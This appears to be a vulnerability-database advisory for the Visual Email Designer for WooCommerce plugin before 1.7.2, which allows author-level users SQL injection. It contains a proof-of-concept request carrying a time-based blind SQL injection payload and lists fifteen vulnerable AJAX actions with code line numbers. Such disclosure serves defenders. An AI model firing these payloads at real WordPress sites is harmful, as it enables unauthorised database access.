WordPress Plugin Vulnerabilities
Visual Email Designer for WooCommerce < 1.7.2 - Multiple Author+ SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author.
Proof of Concept
action={INSERT HERE NAME OF ACTION}&swcm_social_id=socialblockdrag_XpoeK&template_type=user%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)&template_id=2&theme_id=2&securekey=dd041b294f Action: swcm_social_function ⇒ SQLi at line: 2725 Action: swcm_video_function ⇒ SQLi at line 2510 Action: swcm_footer_function ⇒ SQL at line 2311 Action: swcm_disclaimer_function ⇒ SQLi at line 2537 Action: swcm_image_function ⇒ SQLi at line 2621 Action: swcm_customer_function ⇒ SQLi at line 2940 Action: swcm_delete_widget = SQLi at line 3018 Action: swcm_hr_function = SQLi at line 2423 Action: swcm_maintext_function ⇒ SQLi at line 2339 Action: swcm_multi_image_function ⇒ SQLi at line 2653 Action: swcm_button_function ⇒ SQLi at line 2482 Action: swcm_title_function ⇒ SQLi at line 2596 Action: swcm_clone_widget ⇒ SQLi at line 3087 Action: swcm_order_function ⇒ SQLi at line 2994 Action: swcm_textarea_function ⇒ SQLi at line 2284
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Donato Di Pasquale & Francesco Marano
Submitter
Donato Di Pasquale & Francesco Marano
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-09 (about 1 years ago)
Added
2022-12-09 (about 1 years ago)
Last Updated
2022-12-09 (about 1 years ago)